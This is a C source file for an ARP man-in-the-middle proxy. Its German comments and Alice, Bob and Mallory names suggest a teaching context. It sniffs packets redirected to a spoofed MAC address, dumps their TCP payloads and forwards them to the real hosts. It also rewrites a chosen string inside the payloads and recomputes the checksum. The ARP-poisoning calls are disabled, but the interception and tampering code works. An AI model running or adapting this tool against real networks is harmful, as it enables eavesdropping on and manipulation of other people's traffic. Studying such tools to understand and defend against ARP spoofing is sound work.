#include <unistd.h>
#include <fcntl.h>
#include <pcap.h>
#include <libnet.h>
#include "scan.h"
#include "byte.h"

#include "socket_raw.h"
#include "socket_sniff.h"

char macalice[6];
char macbob[6];
char macmallory[6]={0xde,0xad,0xbe,0xaf,0x17,0x23};
char mymac[6]={0,0,0,0,0,0};

char ipalice[4]={10,0,0,1};
char ipbob[4]={10,0,0,3};

char *proto(int p) {
  /* values from linux/in.h */
  static char buf[100];
  switch (p) {
  case 1: return "ICMP";
  case 2: return "IGMP";
  case 4: return "IPIP (tunnel)";
  case 6: return "TCP";
  case 8: return "EGP";
  case 12: return "PUP";
  case 17: return "UDP";
  case 22: return "XNS IDP";
  case 41: return "IPv6-in-IPv4 (tunnel)";
  case 46: return "RSVP";
  case 47: return "GRE (tunnel)";
  case 50: return "ESP (ipsec)";
  case 51: return "AH (ipsec)";
  case 103: return "PIM";
  case 108: return "compression";
  default:
    sprintf(buf,"unk-%d",p);
    return buf;
  }
}

unsigned short not(unsigned short foo) {
  return foo ^ 0xffff;
}

void update(unsigned char *c,int j,int len,char *ziel,unsigned short *checksum) {
  unsigned short cs=ntohs(*checksum);
  unsigned short old,new;
  unsigned long sum;
/*  printf("old checksum: %x\n",cs); */
  if (len<1) return;
  if (j&1) {	/* ungerades offset */
    old=ntohs(*(unsigned short*)(c+j-1));
    c[j]=*ziel;
    sum = old + (~ntohs(*(unsigned short *)(c+j-1)) & 0xffff) + cs;
    if (sum == 0xffff) sum=0;
    cs = (sum&0xffff) + (sum>>16);
    --len; ++ziel; ++j;
  }
  while (len>1) {
    old=ntohs(*(unsigned short*)(c+j));
    c[j]=*ziel++;
    c[j+1]=*ziel++;
    sum = old + (~ntohs(*(unsigned short *)(c+j)) & 0xffff) + cs;
    if (sum == 0xffff) sum=0;
    cs = (sum&0xffff) + (sum>>16);
    len-=2; j+=2;
  }
  if (len==1) {
    old=ntohs(*(unsigned short*)(c+j));
    c[j]=*ziel++;
    sum = old + (~ntohs(*(unsigned short *)(c+j)) & 0xffff) + cs;
    if (sum == 0xffff) sum=0;
    cs = (sum&0xffff) + (sum>>16);
  }
/*  printf("new checksum: %x\n",cs); */
  *checksum=htons(cs);
}

/*
 Todo:
 1. IP-Adressen von alice und bob auf der Kommandozeile entgegennehmen
 2. MAC-Adresse zum Spoofen auf der Kommandozeile entgegennehmen
 3. MAC-Adressen von alice und bob per ARP herausfinden
 4. Pakete an MAC(Mallory) sniffen
 5. Wenn Paket an IP(Alice): destmac=macalice;
 6. Wenn Paket an IP(Bob): destmac=macbob;
 */

int main(int argc,char *argv[]) {
  char *device=0;
  rawsocket r={0};
  sniffsocket s={0};
  int fd;
  char *quelle="wraith";
  char *ziel="xorn  ";

  if (argc<5) {
    fprintf(stderr,"usage: arpproxy IP(Alice) IP(Bob) MAC(Alice) MAC(Bob) MAC(Mallory)\n");
/*    exit(0); */
  } else {
    /* 1. IP-Adressen von alice und bob auf der Kommandozeile entgegennehmen */
    if (argv[1][ip4_scan(argv[1],ipalice)]!=0) {
      fprintf(stderr,"invalid IP for alice\n");
      exit(0);
    }
    if (argv[2][ip4_scan(argv[2],ipbob)]!=0) {
      fprintf(stderr,"invalid IP for bob\n");
      exit(0);
    }

    /* 2. MAC-Adresse zum Spoofen auf der Kommandozeile entgegennehmen */
    if (argv[3])
      if (argv[3][ethermac_scan(argv[3],macalice)]!=0) {
	fprintf(stderr,"invalid MAC for alice\n");
	exit(0);
      }
    if (argv[4])
      if (argv[4][ethermac_scan(argv[4],macbob)]!=0) {
	fprintf(stderr,"invalid MAC for bob\n");
	exit(0);
      }
    if (argv[5]) {
      if (argv[5][ethermac_scan(argv[5],macmallory)]!=0) {
	fprintf(stderr,"invalid MAC for mallory\n");
	exit(0);
      }
      if (argv[6]) {
	quelle=argv[6];
	if (argv[7]) ziel=argv[7];
      }
    }
  }

  if (socket_createraw(&r,0) != 0) {
    fprintf(stderr,"could not create link level raw socket: %s\n",r.errbuf);
    exit(0);
  }
  if (r.l->device)
    printf("opened raw socket on device %s\n",r.l->device?r.l->device:(unsigned char *)"(null)");
  if (socket_mymac(&r,mymac) == 0) {
    char buf[50];
    buf[ethermac_fmt(buf,mymac)]=0;
    printf("my mac address is %s\n",buf);
  }

#if 0
  fd=open("/dev/tap0",O_RDWR);
  if (fd<0) {
    fprintf(stderr,"could not open /dev/tap0\n");
    exit(0);
  }
#endif

  /* 3. MAC-Adressen von alice und bob per ARP herausfinden */
  if (socket_createsniff(&s,"eth0",1,1500,100)) {
    fprintf(stderr,"could not create sniffer socket: %s\n",s.errbuf);
    exit(0);
  }
#if 0
  if (arp_sendwhois(&r,ipalice,ipbob,macmallory,(char *)etherbroadcast))
    printf("sending ARP whois failed: %s\n",r.errbuf);
  if (arp_sendwhois(&r,ipbob,ipalice,macmallory,(char *)etherbroadcast))
    printf("sending ARP whois failed: %s\n",r.errbuf);
#endif
  do {
    char *packet;
    int len;
    struct libnet_ethernet_hdr *p;
    struct libnet_arp_hdr *a;
    struct libnet_ip_hdr *i;
    if ((packet=socket_readsniff(&s,&len))) {
      p=(struct libnet_ethernet_hdr*)packet;
      if (ntohs(p->ether_type) == ETHERTYPE_IP) {
	char ip1[100],ip2[100],mac1[100],mac2[100];
	mac1[ethermac_fmt(mac1,p->ether_shost)]=0;
	mac2[ethermac_fmt(mac2,p->ether_dhost)]=0;
	i=(struct libnet_ip_hdr *)(packet + LIBNET_ETH_H);
	ip1[ip4_fmt(ip1,(char *)&i->ip_src)]=0;
	ip2[ip4_fmt(ip2,(char *)&i->ip_dst)]=0;
	if (byte_equal(&p->ether_dhost,6,macmallory)) {
	  printf("%s > %s: %s -> %s %s",mac1,mac2,ip1,ip2,proto(i->ip_p));
	  if (i->ip_p==6) { /* TCP */
	    struct libnet_tcp_hdr *t=(struct libnet_tcp_hdr*)(packet+LIBNET_ETH_H+i->ip_hl*4);
	    printf(" tcp port %d -> %d, %d bytes\n",ntohs(t->th_sport),ntohs(t->th_dport),len-(LIBNET_ETH_H+i->ip_hl*4+t->th_off*4));
	  } else
	    putchar('\n');
	}
	if (byte_equal(&i->ip_dst,4,ipalice) &&
	    byte_equal(&p->ether_dhost,6,macmallory)) {
	  byte_copy(&p->ether_shost,6,macmallory);
	  byte_copy(&p->ether_dhost,6,macalice);
	  if (i->ip_p == 6) {	/* TCP */
	    struct libnet_tcp_hdr *t=(struct libnet_tcp_hdr*)(packet+LIBNET_ETH_H+i->ip_hl*4);
	    char *c=packet+LIBNET_ETH_H+i->ip_hl*4+t->th_off*4;
	    int j,sl=strlen(quelle);
	    int changed=0;
	    write(1,c,len-(c-packet));
	    write(1,"\n",1);
	    for (j=0; j<len-(c-packet)-sl; j++)
	      if (byte_equal(c+j,sl,quelle))
		update(c,j,sl,ziel,&t->th_sum);
	  }
	  socket_writeraw(&r,packet,len);
	} else if (byte_equal(&i->ip_dst,4,ipbob) &&
		   byte_equal(&p->ether_dhost,6,macmallory)) {
	  byte_copy(&p->ether_shost,6,macmallory);
	  byte_copy(&p->ether_dhost,6,macbob);
	  if (i->ip_p == 6) {	/* TCP */
	    struct libnet_tcp_hdr *t=(struct libnet_tcp_hdr*)(packet+LIBNET_ETH_H+i->ip_hl*4);
	    char *c=packet+LIBNET_ETH_H+i->ip_hl*4+t->th_off*4;
	    int j,sl=strlen(quelle);
	    write(1,c,len-(c-packet));
	    write(1,"\n",1);
	    for (j=0; j<len-(c-packet)-sl; j++)
	      if (byte_equal(c+j,sl,quelle))
		update(c,j,sl,ziel,&t->th_sum);
	  }
	  socket_writeraw(&r,packet,len);
	}
      } else if (ntohs(p->ether_type) == ETHERTYPE_ARP) {
	a=(struct libnet_arp_hdr *)(packet + LIBNET_ETH_H);
	if (ntohs(a->ar_op) == ARPOP_REPLY) {
	  char buf[50];
	  if (byte_equal(a->ar_spa,4,ipalice)) {
	    byte_copy(macalice,6,a->ar_sha);
	    buf[ethermac_fmt(buf,macalice)]=0;
	    printf("alice's mac address is %s\n",buf);
	  } else if (byte_equal(a->ar_spa,4,ipbob)) {
	    byte_copy(macbob,6,a->ar_sha);
	    buf[ethermac_fmt(buf,macbob)]=0;
	    printf("bob's mac address is %s\n",buf);
	  }
	}
      }
    }
  } while (1);

#if 0
  if (arp_sendreply(&r,ipbob,ipalice,macmallory,(char *)etherbroadcast))
    printf("sending ARP reply failed: %s\n",r.errbuf);
#endif
}
